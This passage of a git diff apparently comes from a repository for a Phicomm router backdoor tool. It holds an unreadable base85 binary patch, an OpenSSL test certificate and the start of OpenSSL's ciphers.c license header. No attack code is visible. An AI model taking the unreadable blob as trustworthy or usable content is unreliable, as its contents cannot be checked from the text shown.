zxA=D+{%ec>Ko&yjxZUE@J^c3;U*h4qg$VlbRUZClD}SSh%cc_2@Bh)mpRxGs9{!TW
z-}dmoS$qKYGvwo4i;wm2E{oTD_-7XH@bIrJzRAPQ5-Qez+>I}r`K~(8%n7~k$>&@A
zFi(DOi%<1%`5*SgK4*IPVHRKS;Xkl=r-z$)bx!CJ4==Uy&w2Rq7Jt{nr&{~~Z(K3m
z;=??AuEone{4|Tt_wYp)U+UrY7QfEJ<v(5&``qf`=URN5hhJ#%7d%`xWf7jwz4Bga
z@!xsv<>wYZ*~71~_)ri3mBn{@<15LvA6_K$k6R$`g$xzBD*)dbfIkO(Pb^-#`y6_o
z6-<8*kpCnA|0V$69qS#v={Yh0mvy(^<WCI1PY%Fq0`Not-VuOb7l6z5M!o5|H2{Au
z0GIWk-gw>#z`qQ@bFg018_(bXJRE>WfQvs=Ydo{}yWtPf0Qr*w@KXcuvjcGXpJaQ}
z|Kb4rR{{840r=Jc{M7*b^8h>_<BZ<)+&=&xAAnB}z)uUn>jUuS0DMINzB&N^X#jqE
z0RH;`d~*Q)asd8e0KO|iUT=0jH~`0+*1gJ448ZXibg%NV?$cYo=LFzw0r=VgT-JAb
z<G(ckmvx!m<YoP(H~ifI{PO^OH}p5X@f;L@j|{+%3&3Xw;AaNlO#%3Y0r+JB_{{<M
zy#e^20`ScN_+tV1+X47T0r<ZH@NWX}J+WTUTYU`;z$XUal>zvv0eB5?=@-J-&|eOH
z)(77$0rD#X@Sg_YzYV};Jw@`p+zwFmxgg~GT!8$i0r)OhFX+u~dk5f01mMR8;3oqY
zJ#!8c>x4r3OcK7U0^}D5;L8H=mH=GVUwSLoPXh3D0r<}Y@Y@3LdjjyM0`Qju@V5i-
zj|1@T0DK_US$eZWH~>E~03RKIM+5N60DM6JzBB+&1mJ4|@T&vx+XC=E1mF(`;7<qO
zF9qOl1>he9;9m#e{jq-3TRk2SfDaGAM+e}O0&v+-ytjN$3cwcx;B^7`vH*N}0KPf^
z|8)R<R{;J<0RC(M{!Re?j{y9YfcE%Ffc)fudYAuRwKx0c2jIg4@W}!AX#se10Nx&e
z{~`dtDFDAC0GIz_4F7r@4+r3X3BYBYu{WO20`Tqtd>5=o^v1JS050nny~&RXz^4V^
z^8)Z?0r=_w{Hg$aeE_~G0Dm?Be=h+4X8^uC)*pMb&tU<0X#idkfG-Td&Hi}ih3zVN
zHCW$nHCvjrhH9IzyNT=|CufVAYFE(46Yedg5Z)+}msLXM<)Rf}tkU;1L!&CE6w9Ad
z`4f>pW8}|R`7>Jnl*pf><<B_zGhY5gR4}3mBPtM4*@&i%XyS;biD;sTVb`=JnyN$@
zN;GYW$w$+cXxb7@TcT-8H0@}kkm92iA8l~u9HX3LjQYwsMmfhQ=NL^pMpKQ^RM=Gk
zr5LNJ#%ijgRpw~rKUyV^R>=~>ulP7+9<9uy&AFx>ZFme~tfw+#&ABp<Rfe(3JXV><
zD)Z5r_GnFew9!P<9<6DQR+(`sGfuCL)2rk3>NsT{XLM8MamqYSQ<Z9}Qk5yyw56I$
zsWOx*L#d`J)l{XLYP_Zzukzzne!R+$SNZYEHePcauW83?+VPq;f{hx*If^xPq*#+j
ziZy+tSP3G<$`C15ib%0?M2eLpQfyePTUj5o?q&VUI+*n^>tfc&tdm6yi*d7v@w13=
zw21MvNQu$K_*%p`Tf}%<#JF3;)O*BKZDh15k*V~E@qox^!(u!$GTM~L_-4d7XT*49
zWQ?)IXrq~N)`;=Y662f^<Eat%%h<&@Ys7eK#JFq3_-kaW;T&tMYg{cd)>zj#Tf}%<
z#JF3;_*=v{T*UZV#5i8$Xv1QhE@Ik3#59J8X$=w693sXeBgQ2o#wR1DVML5?MvQYt
zjCV$idq&2Y5*Y`L7!QpY7mXP2j2QQf82^kI2aOp2jg%Ve8h?!#hm9DIjTo1W7@v(8
zr;Qk|jTpDJsg3tWjQd86|3-`hM~nxT7!NKn9$aEPxWssHiSghP<GLlrXG@H;mKbL(
zG0s|IoVCO_Yl(5z6635T##u{@vz8cVEwM4t1x2me5*rqcvz8c#EV1#?21pwrjn9@C
zXDu<#T4J2F#5ik-an=&!r6tBoON^J67{4qrepzCCw#4{siSttR^%CRjC8nX4nATfj
zoAj8YLyPL0s_<5MsA^i}%*oNps+m)#&MBW;rTdUpg(g?btilV^jd9rs^z1tAw9IZk
zRoIY2Hma(@4h}WTnnN=upHLNF9xuTbY$0sL8L0wLK4osz;+DEP157KQQ9e6bS#fH4
z+1!fh<=7N0E+p7LASAC=RxMd3o3d3^*Pa!cGW(QSb7x`$EZI9YG<n`s5p1YwUXeMk
zjvLl_bEhbq=3{t-*KDj<C0h;{_8C!RiPza>XD*wc$mt#^Gjx|m!-p+c%cqsku8KER
zO`hSht4%bACeNr^)L62#Zn>OkZf3{XD(q8LwP*#lvcYaZb{AUw0CPN~m?}{vHnPRi
z#8oH~Hdm{vS$eh^9$-_3D&57%7(7&8Qe8!cG*ywn-e?NCV$0S+*g~PT&J-0J|Cr=b
zr%l+XO)WCJ{3K)T-mQ``of^p~QG>0D;$%80rCuSde8$|_r)c?Q*N|Q>m>v1lJ8)Xk
zh<#>_{@MH3in*;X=;icQxK*-oD=|xXwM?q2)JyBxRoL=CzVsE}v?EGZ;*|JSr_7|1
zqL`XNwLwJP7}cXWn|*b)x-u#7mTy4eJ=<kb&!{M4UF#a^uoWQLP#YFDJTV!o7b|2E
z2^HRi$HoDn^7*r>W}R4mN|oKounIK}$CmwYGuKoTj3!lUdE?#CWE2$B!F6G2EvR*L
zBPDH7H#2E5exwq;wo=zdv-QS%>Wec>JzJl6AQi~ym?<DDB%W%h$`{PVwtd*B#xyt7
zaC1{L1r*m*olndktzKReU#{uxPwbz7F|_0e0F($YwN(a`{nmKH8Hsi^2sCgAY{eN`
z42{XaDovIb=~lCIpPXt-)K(Y5z74W@VQrNJS1l{bZ^|Twph}jXx+SfEvL&bPf9H}^
znXU3NDYY^sGd(eT6iH0R&J0cJ#Y<bV!vn=wwXq+AMd@BIXa?z!k4?y&67y%CSYD=f
zmI;jM3$T@sjq&9(=1oVCp9>LX$oNs_C&{F<CoEn4v&&6hsIQ3BQdNBk_O_`;uYkG{
z2bbNN<Jh;MC4`-p>!ti9i<iYUAYj+LMr>Fs=go=Mr6SNE`wLge)>2iv*M|!@t=Q5H
zd*7a83MfvR-V_KSyb2o^REK8B#*tdX=1f>ZhDtXJumY0UMln}ORp`P(*vPj^Hg~L&
z{g3L5%ZNQ}p8+M+I$G`6IKcceIq3xnV>JzR)r|;uQV2P3F%e$71(?y0svs0bCMNK<
zhQ!-the^9#S4J0AUp76k{RcLW#6E0_ny$=*NOK-<!ftMLFf>Y{`!U+$OLTIZYpRCW
z4%OI2x<4&YPxlt5l#W?Kh@8v()}2c|OG68p4GA^F`c~{yB2|rjNn8i3mXs=Ql#aEv
z`W$D>mL_Z}>VBjHCs(W4hEDp0bpO!WsBu)Kbd$P8D|F=G`j3W2s$sLiPL(aF89~rx
zXXtbz7AK!kK6lQP=&bT8Yz<aXwdm+Ea5CA~#h6I@vUDFKg9+(6veSrewmZna;KvBD
zXs?3mO6UM2BiT>W<W0fIGKtZ!*N?f3-oh2cSlO0WLY(nt7vnHssWq}dq-J!uCNZ*6
z^H?0RRbv^_-Y)h@{}Ana?}&Pc$<8xoUyJPIvOyQ)E{+HRijNUo$s*f1x=WI)QLDG1
zV0Pn#`HJo0jWwY(*;Z_IsA||wMldmSruV6`P$rgT6<W4&!KNaz9+bhQ7w>6lVagh;
zi25#Q$<DA<)vYydK@*Py=^?LE?2dP(zLEb=1_zd{(zv|3?C^1fV@WNIS6f^jU)_Uv
zR**dNw-LTC&K<vdA6N8|ccUHtODiw@^6sU>|CjK+2*1bTe!1lT!I497xkc)DHVcSD
z_zQ^V8AS~~nDAFE?(@G(`2IL|{GSspw@4js-cvRD$i5m5&qrQzh(3E$z9(B;@|9bd
zPQHrd_aXTegzroE8jA~$yc_R$%=?WdUwN0+;nx!n<G%~wxi3I|a{%t1XOr^o2N{>I
zdC#zCy__hD;}H4%N&aNQ4<NjjaQR;i9lv?6%<vpU_{COUz7E01$(#4VjJ&+l>+q|H
z{}94&B0Nm^lZ4AV-;O6`arp{UzMm1!?dVJ5VZY7Q_cx4Rv7eatpp5?PC;J7+kF~hi
zndQy<MLqdj1LS`}{H*`=gb$_i-c9(Sgx^p6?9basp3D0;l4t!tCV9@+ynkZsb12oz
z5n=!wVs6&InDE1J&DG;ri^~_+%OsL#o@s;^63=pr%hzF~&qXB9JeLtZjCgJ&{BXi=
zwYYq-o}DB=oaDC!$eZ^ljD3no-n>U)?8*FpC!Rr6u1_i7BZy}w;auKtiHG?|+2<nV
zvb<yO>IMHfryhb2BfOn(`LB1Kyn9bt<ckP@(#nfJ`~V*(Z=PQ_b~uvo_lckN{DgQ$
zko-4<k0d<TcG!~dD8l!&xai6JB_w|o$wvt<CVVF05yDRo;9o-WB_!VzAm2_n+kZNq
zmz6{GKZ5N1JB$16?q0%2BaO5FCgNc`yh^z2t>EN8ARhKBd45+8(dS5#&%^VkatJ<x
z@Iwh7N%&}s`}$8Hd<?jpKJxso9DY5XN%$z@Zz23B!Y?4anD8}(M+jeManV!q{<j$h
zc3(^KB_w|b;iCzEn{bx@HUJ-l=St;}e8=MB>@d>eqRSZKpF#3Rle~K$-M8~n;$eUI
z3Gr~f%k#BzNWO<tzSj{xmT-CQRt`Vk4TKNHbyu#3h==uY?~zNsM-#t1M=OWm;|Q1M
zW#tgOl<*kg;|V{-;-aUF;hjD;Brki+IQ)FVk0Jb*gtNcNbFp#=e<?nW=YEoxy+|DX
zD#?#0d3i2Y4k;JQ_rY_PatQwfd>qg2gdaorz83d+#*q9(l0SxU_J>Kt!}V1~INN6h
z@f=J1D+y=*i;0K%?<Sn>yoqpb*G~oDe<S=@vi}zr7keH@db;<6#cs!ud@-Kaltb|2
z33u-S3lEp;I4dvsP<&i{l@kw_x1QuB4;y~E<0L<l^1YC7ZZE$i9@ghZ!jC6?ZY3Vp
zXA|Mf{}k~s{|kh3d0!(Q=Kq}VNmQ;JJf|gx*nsQZy-zH7l;jT}d9IhEEH3uv`O6rR
z=lRPd!g>C(f^eRvtRa53!!HP*guGq7Ur#)2hfRbt|8vB{{M!kS694<e!~F7msvN$5
z{)_O*xbF1)CV)qtPnE;x8BX{VTz5R9EH3rM`ou_{%QcteWp5_Ob6SA>BErik-+JQV
zeB&g~`K}`QDU`2!ui7u~jl@$<`QA!AobO#E&-p$`_*CNA6u|Qg;bo-ftAv*m{xRWG
z3Ev&hJIdjgYfp<yeN7|z!%3d!mBl2_^U8?<@}~yKCj#Ve2#~*%a9;QLBjLR6@mJz!
z`@8qT#STO9asKu`@o+uvVjq$d`|y0~5W+{2-9`l9Qv&emg!B5(Lc(QlGN)&faGpn8
zWpOFjG%D9E0r*D3**=>Ij}gz~7WdorOC--ce<Qqtc-{@*`IzKSAo+h2ej?$yvIvVq
z%3Fz#vrhrx(+S_7aMtrM!e@|tk;VP;P9pi4Brng8%Hg-K8HCTmb*HC1S1O0kUq|xH
z-#|F)-%9vN;B)-vS={Hpgyfn3r-U>A)r8L`{u=`L?<9HVzn^gC{}bVJh<{4}{|h9~
z{I3zt{9T04CH_wW_;;~40Q`EC=Vj#(d>%f|&Vw!P+j&32E2#Y*P523f&nKMYTQ%V)
zl6=DAqR)KN=RA_<dBo*}^Sb)AgjW)OC*jixf0A&PPZ2JACOZ4{xBCZ(eP$BA58<;2
zFC_dV!ix##e(f~EXOsNd7XJbAokMst$;%#&PS0}*pGWwEgwH3u)8b-(DVv>EgkB(=
z{qQxyPlmk9_if_mekVop!f%Jop|40@?uj^_0rtIrr;n2#WO3nGK=N+?29aMt`b;Ew
z=0AyW=BcK9xx7mWKZW?05f7JlCCQ&k@)r}%{ObaEZY2B^D(~F^JP#0l8s+;Z;$c0v
zkUZ=27|HXx*<T4~|Nkg}=bwb1PWt?tcvzplb{`0-N7iSM#iia)B|Gd(@~06VA^Fn@
zFD3aiNS{*)=X|RPKa=EJh@Z!+7ZZL4<@;yiIh1&|l04rBd6VRMy!tuG^LVwt+}y<>
zb{mRMx*ZYD<r-vhu_xPq4&i*?WKjT5J>h)cq>*@-|2&dseO3`(NcvwM!1EWv&m=p)
zMtBwBpA*jh6Ox<OIK&PMNq!LF)r9YBao<0WAiN4(&i=*3!*)24@I}Nwn|RnhrxCu8
z_!kln^Ct+eA^tYvVg5@9uO|MV5)boVPdN8?za<{#znkzy#J`bvnEyG#Yf1mN2<LvY
zi}*R;e-d6p`F=+{oNtaitboI>-#m+ppKv@JLh`k^=IZ?rl4t(INuKpQlH{3x9Ld)a
z|8XSG{NEB@M|R7Tha_-_{)-8pN;t10%_n>*$^S3_Uq?9K_qmSndg8gw;=Y~lBYZJ*
zb@tpyJY3$lNM44(PX1Gp=jT|y4Uiuy4|(A5^*M_0CAjYRCs<tU$@-i`@=Hm60pVQl
zRRKKBgzrgqyC{HXE#dW)@6U*b^}L7V&m#Fwl0S>`eVTB7er7xIaJfDp{A}X?lz3R5
znes3V4zcIil<ygY^LoWug!A)4=Mm04DZ-Z!e~vt?gG2INM)+{TnLk1}^N%OIk$9#M
z-bDC9!g<}Jk?>}cznJhJ626}B7Q(j#;2#Fy_sSpxhu9%bJb$#fYZvZ*;%34nja}9V
zz3Sn@DaX4W?%L7E9=_AwF!;*i!p;4AA9=_Lhv3}5=UUw9>G=00JVE6;oOpOVaJ4M5
z;}D((d>qeui%Y&d551G*my!G*0_2}3`9_j|H9-Dzl9#;YBS*imeyN^KICXjsu(+@1
zD3Wg``J)5m%Srx+BtJbs{&bRWA^F+>`Bsu|CHWr($p4Du<0OA;fc%prpCI`c0_6We
z_&MY!IYW^chxo%e_&7W7ZgJnvN0R)xBtJSp{v?uLPV%P&$e&O0D@eXQK>h~8&+U`Z
z|32b5k9ht>^6cmDko=EGzAHd}k3%7ZL+o}wKF)6YS=_hVM3TRN<jVr&=aBq`B!60f
z{3?>ah~$$2@^_N_N|OIWfc&c@zl!AF4v_zr@a26n_6f@*3WwNd1>s{X-WT|f@p1N?
zNb+1?Cz5;{$<GOpUqtflB!5<be4OM(SEo-q;j0P1G=S%qB>xkVzbQce9+JP9<TnJ!
zZy|Zn)AcVe5Wa?ZUJu~;lJN7WUIr8*F%GGhBtFg#ds$ra<a!xJIP**<o=b@51d?Z-
zI>MP}1@Uwc&nl8<o*PL1Qj-5ofc)bmzn0{m50LLW3_>`>KI`yt_Q|t&e_*W7@g#p4
z$xjQAKcD0;C;9dO`QMQIPf7mH0Qnb5{%0irw*dLj;Sj<h<^4H6uDrPx_shF4$zMV8
zhXlw^CiyE#{)7Pei%9+|lD{}Wej~~Mg5<XZ$p4GvuO|6#1LPyaA%sKh!}Enw!v6=?
zoZX^?%aXjqV}xHr_;ibloq2xoEy;7feTyK7!<XNU@E=io-_PQr|1a@z`W#I1=ac+s
zlE0SZO9SM~3BQ1N<`It!ja|O2B+u)CNy2$u@#n;I9r65<<cCnczb5(XN&a^M@(+?c
z+j%qLHxSR`#KZOV9N`y|KJO8a)R|pI4t0_IMI@hd1cY#iEYBYYT3qUpdG;cl^&dh!
zD~bO|k{6zS_{cHd!=0X!2wx95SC7*O{}tht78mYSl<xwPmuvEoV=3Y5@!Rn?5zhQ?
z6912hKNWy~9)Rn^)5uTsV4i_;!wQFd@qPcn78iNGZxyz<A0LL1Jg<+92#_C7@@-VE
z*@Uw{R1qE~`T797mGE|wUrqRG!Y?D7*DZfVINRq|!hb?McUj!`+xtlVVv^tJ$-Db#
ze-4n}O86S$d7E%vujqfI)Napsz8B#);=1$0{Vgu_&h7mOlD~=Miv#2*lDu%a_7x-i
zX5yJiJlu{>Cp<~zts|aa6VF*Be+kK-M|cO}KPH^lU6aJm`d>~s$Db>S=ThRoIY9na
zlIQkvAIWpR8wvkkD(_~(e?|DC#LxD8m2kG_Tg1cV`h?`yQn|h)dC^loa(w6EuHJJ-
znCsFmeuIzmw>*nWde-v*!dcH_h==Vn*~6Va6@=eH`OYAI&i6FJIp131xs`b8NuI~a
zD@mU9yx7B?p6dwzE%9GZ{H*6)gs-D|*+e+&znO4euX}=UUaxzFaF*XrILm)PILm)V
zILm)SILr4RiNfO$yRiHii~Ie~aU{>}sEXu;%h`FchdcjVM)+-zcmCNz{A~X=l4t%)
z2xp#qiRUt^ug3|$obcU7K?xjEULH@DSzPku@#JYF&+T^+;kP4=D_1@7aGXE*C<x&Y
z{-2UQ#}Pi1@N$d$^>PZ~zXO-c_e|p9e9tBMJ4pT#!tW&fI>PTF{4T=pCj3tpmvV8w
zTS@*Nl7A{d{_lkI_@sX^665ggFo5vi<GQoMo)-7@nM(3<O+Io=_i*R8a|yo}a*qEL
z;%C1-i{zRAhlDfForJSr{h9cGM*i?Zfc$HO-$#0O5f9hPz7Z+4vFH8xcI65a&iWj0
zaVgW!NuMUduOR$x;$b^H;Ni~B4-x(c(q{|tvz=cgdFFqeaOUY#0#Y2l|Kt+>0IoYb
z>~3-4zLLsSMEF&NV@oqVeEtc9KS=z?6A#zR1tc$dJNvW~zJYi;2>%t~mlHqR?Ha<l
z|GJHMBwuHT`#s$0^C!apNb*|<XMG;CxNx&Re<7Upd6#%3ja#?;hlk5GIll04r{}kX
zZ-ksHSKrZ^Oxr)}vp?a#p!zMexYX~Ti04?6XZ>fAyy)okobTaI&oc<$MEr}0pY=SC
z@T*DBcH()6c&;IN*7H{+&wAeC;ZDyx3GXESdx@X*e3J10Aw6Fuo<9@MTZD7`d5?Iw
zy?jDAmuvSiAjKi|#pN38;jUZ<5dJXII6nznTsXK~*g#PazrAB`$TYqgXO8Ds;$i(y
zBK#V%Pc`vuA)aL<|4Wj;faD(``F6tDo*l%)`dmpkKM!^%@vuGb_wd15dbAP3d7SpJ
z#eI9eMDoo4H^P~xn|LlGI~+3BC?Fi;2tStaQo<Kl+^<J$45WwPTk&!A*hD-H#B&kJ
zZzK7i5T0d!;$i#$l5l<=`!?cvl=ycL&ir2y{us%BNBo>GcJ0)|x5IISKTbR`i;JC^
zr-kINCHtI9@~0Ah3E|ffel6i#k2euNm-n}XKS6r_o_JW#4J6Mze<u7%;(0WH=Xt_;
ze(?qIFn`WCkm3+KKZTF;tAQ5x?YRfxN05CEA)KH8Ka%))UW4sv^$>oZ*VL2z)1=Rj
zNd9`t_XfhbULGNw+t=Fx{M{ta{8LLadh&eV{r@Inw`WMt^R2w^x2uSU>-|c?`TeXL
z3FmpoodNv!6VCI#KM@b-`y$D+KfF%(vsA8k0(ib6`R7RfJCeVF>TB=u5W*q$c^)6<
zZwC_2JVPxmezKl;ur0D4zMZ3l|AqKt#KU$tlkf|Pe>w3;-UCf`p$ka<B9gzH<k_A#
z6aE6}a~tunJ`a)nizL4_K>n{J&-v~k{3YV~M*z=vB+uo|nP3Voc7B<71`_@X;d@wI
zICy+=Xn_0zlIJ+wLOA#PYl(;B`Oiq6d9EjU(MdjX{My3@8#r`3;eQ3@{PS+&=W=zD
zJo9fOoOxa&obC1w@pGK{itt~Nzx6-HDD3<H0K#7-{RdfGbSxsCp@iQ^_z1#pB773@
zv%j4{_-mB!OyXfbZzOrq$=N^Q;jX^UC;WBdUq$>}FPD@2-$?#Sl4m<_BK&45?<2&+
z<$aRyH;Dfw;^FeXP4es~DGzsc_=NB`iT_{3&*kku5kfe`ADDjt;mmUw;askfgl`9z
z^Zzjx7j7=sF(l9VPWEtDt_s56BK{e~&*fS~^2}dPIP;uGxX8P>{WA}jYjXULhdVvj
z6aF^joE?5`aY@g5K0r9n`<^Bq*8fEhclo|f_&b#ETg1=#en~jz`yKJjC!YO|#Sa|5
zpM*W!=`)=0cahH7VT8qfI~-3q>vIzEupJh7xXX75;eV%m8;Jkc)J{7{{ymca8R6{b
z*Afr=^W%j7FY&(>z_Ww!_bK0h5D)VYI1WNM{J6a*;X82M*?B*Ui_MtlFv1TZJ&z_H
zF7IT*Q^Y@wc$j}C;XMAFPduWNtFJRj{x_sg3(2!S=M(+`>9dM>Sf38UmlOXr#KZi*
zB77+E-$FdhpL0BfaJY8i%2i@<DeEniZ<ORY-x%RtNaO0Uig-BR#U#%>XOleN=Q@w%
zdHiq@$=^zPUP3s}kFFyg&i7`*KP3HcCmz=SUc!G%`Tmjc+X#Q0_&MKaNS@2P%Oog)
zL+sD`A36yD4#9bTw|tVI1|LuPUO7o&t>2Gu>gwehiwh5r2ks&KcH-G;alidOMfk_y
za{SK|58LgpB+qtugXGx`eWM`7A$tCf^!b6seSMB0{2xf;^qEXNtj`RR|Age{1;{TV
z{Ej{u{(9o!ay1kFDe<o%o;!)>GLmPWYY6|0cz#7ZT&~}dd>zT(8zBD>;dk}PlxrK|
z{JhW|lR=6@>ZOk4HxbV5;t9g<Ci!<P-WNPv-VX?$ifgVOKP4V6Z@(!J!Xf(HL;MF2
zzJl;WE$-)g1mQ!$<?{V0;jHJ=giGEoe*W9yg7JN;y~_aL@bf*$;v)Zh(z7r?ek9=w
zk;ds+LOg7r351ss|5W1Pa!n_E5%Dh|9_DW*{9fX3Bb@zbE%9@{R}o%A`K~7(&i4+I
z|D5FS3y}Xa$#c7SGC=-0!tbMUy+Qc>gl{f~5;*$f!|mcJ!eb;qN}L;q_=BWz{_{BD
zY@g={=XUXm#f5|I^8w-9E^?+p5QoTfyBK6~-#_;yd??a5e><3XIN$R~p39XVlU#fH
z|K5aixel?oU#<w@T&@bjxm<IJpY3@X;asjb@o@jUj^vr=O2Yq%@;UolOFV3!`$?X8
zItl+5@oWp=d79*z=XH|jb)k1ip7*KvmgG+-{~TB$wbiq}_9FZXTzBQ&-{O9K9ZT}8
zXBpvN63_Gip3@2EdZ{5E=0A(@oy6ZtJX|lAl02`+{*>hZK=%1vfc!lq&+EW%5YBPF
zi|_}Cf4~V)8i&~PLBjVYob522a2_9?V{yM-UqJX*$ivlRJMpl6ena>M(&zWYa~<(?
zlKc>o-|a*Q;Shbk#>eG*pv9%Ue<b-cNuKL>8R7pXo;dNa{y!(2+r`a<^SbN9gmZm8
zM>yBl8-#Pcq%1Dw<@NuagtNbO6VFDn!#<TDz~S>8L^$&tYH_jWdg6(YJlnIB@NbaD
z)ywh3!}eT6@{)&q<f!*>*RM4b{w?Gje}edVoo5Z<ysmN?@o>IZdAQ5>I>NuBd~YOv
z&i8)8c|GJ2;$gczNq9H$zeqf6w*k{3ghT3)_21LOo&G}!4^cfHZgJt@b)jQPp83l>
z-0{yLybtj&2;g5vIM>Thh==X7mhisBe--hteQqUr=DCaTe#G;K0G^G6|B2+ECwzax
z|3>&G!apGVA;Lp5q!vvb^8Mcdgm;pBG2zn*pJ;LM2QKdv!uykajClCI#sb3sO!5l}
zZzB9M!Z}{uNjUc-n+boIcwQr%pU3DkQ_Z73zM15Q5PkyTMTCb5j}g9w@L7aELilNf
zZza5e@NI;jXK~;Ds|e2_`8CADe)|yN^GSXy@ko1g?e1xkKbhpW6VCSeDuAc|tc;x>
zC7vR}A0xb&aJJjAg!8z18R3r;&yOuGcH@5M5|aM|$=^UY*Y6*RhyA~k<ewm(R|$WT
z@b`#^``M2OXFdN#JlxL?J;~V9_lF-4z6<3WvAEPN`@<~4c^%-_g!6pxLE?W7T&{oI
zMDjeIe39h2yss0^JZ}-tdeZ+Bl4tvWNjQ%Oz9Swk@6g%CZej;sKmYZd49@N1c8iOh
zxn0~#^4u;S36OuB<QGu6-XM7{SBmgmN&aKv;c|UV^32m`t|^!3&-2zii~Ig?AmQA;
z#t_c))>(vClAcu-mwa;xZw-+DG0E>n^8ZWnTra;Pd9IiHNS^CuYk>R{B+vEoCdsos
z-y=Ma^!$i;xL$UjXY4OJK1K3ji}z^1gbyJ32=OrgzJ^|XlW_}&KoQEp=e@lRl4~zG
z{4<LW^6=0;1{mVuyIVZ$;bDsxdH9hQFZS?B7BBViSr(t<;fLAZb{QaDuF)2^VKR-|
z+wt~lD2<<K`F%SayQ>lP?cnxj^zCqi<q6vyoIU?+ao-MKS=_fn*jAu#hj|vC<neb{
z+_%G{7WeJ2k5znu$FsoV3qAY_i!b%?%@%L=@EsOk?%{>|8DOP{*IRszhhJ{-%RT&M
zi(l>GL-seodJnI(_$?m3%Hnr<_(qFA;Ndw37@*U`CtLhc4{xyevmSo0#b5F8*Db!?
z!;d)706RQ<k;OmxKc!tUixW{0UJykKF<M=7@(MYHJ0BOhACS&Y(ug*Kxez=sn;glW
zcve?kZ6%0eC)g<0+4v(YBQ{otKf%)Pdoy2LhV6Xtc4ode-<!9yZ+8g^nSj4@{7=At
zI9@hB#<V}LZ<-^Y$!x+OIo=ESd&f5de(rb*`1VbkH<>7(ANh<^+jE5&yQiT#4EVXv
z`z_!jKFrXR2hH>5lHvTWkWKg(zwcH7Prk2i(Xr+K+7~no_(eb8Dld=gX0#94EKD9q
zTTG^-+@RcQl}iEmyuVylc`>I!_kQlfq*FnlVK7foHF_Fx2gmceMuqe$&*se}-+%D%
z?y?z;pS%5Rc9ahna}*+Oj(vj30jedVmav`Fe;gCIOqr*3J=4Io+TTYS@bt<o*Ol+Q
z!5T5;_g9xQlh+`~y=-Qwfl74?o%jVBt@b&@)liJTg8|MN`De~gBDz$3!F?#4^PT{g
z;*WiwYgq9m`E?5Q7(X?}cr2pJ6zl=)uKa!9vIx3=nLl15t$zbL+Y|Jz_$MBJR|_rP
zRh3*yaD83zSGSG$(oc->89T<Wfzfjpz1_}^%-U{)(6t=N7cH#q`qTMsjJkNjPoeOY
z?zgev>X-A=8Zkxd7yJPV=ZyUF=XSt*Oirss{#%T7<!{Iz51_5e5ue2%ucC{u>(?0@
ye!W*l9C`wK<ik1guK<sGkIbhZdBktzZkW{3RwWBHjiGk&@9dc8r+=<Ri~PS(1SzEe

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cert.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cert.pem
new file mode 100644
index 0000000..de4a77a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cert.pem
@@ -0,0 +1,11 @@
+-----BEGIN CERTIFICATE-----
+MIIBoDCCAUoCAQAwDQYJKoZIhvcNAQEEBQAwYzELMAkGA1UEBhMCQVUxEzARBgNV
+BAgTClF1ZWVuc2xhbmQxGjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMSMwIQYD
+VQQDExpTZXJ2ZXIgdGVzdCBjZXJ0ICg1MTIgYml0KTAeFw05NzA5MDkwMzQxMjZa
+Fw05NzEwMDkwMzQxMjZaMF4xCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0
+YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxFzAVBgNVBAMT
+DkVyaWMgdGhlIFlvdW5nMFEwCQYFKw4DAgwFAANEAAJBALVEqPODnpI4rShlY8S7
+tB713JNvabvn6Gned7zylwLLiXQAo/PAT6mfdWPTyCX9RlId/Aroh1ou893BA32Q
+sggwDQYJKoZIhvcNAQEEBQADQQCU5SSgapJSdRXJoX+CpCvFy+JVh9HpSjCpSNKO
+19raHv98hKAUJuP9HyM+SUsffO6mAIgitUaqW8/wDMePhEC3
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ciphers.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ciphers.c
new file mode 100644
index 0000000..66636d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ciphers.c
@@ -0,0 +1,239 @@
+/* apps/ciphers.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
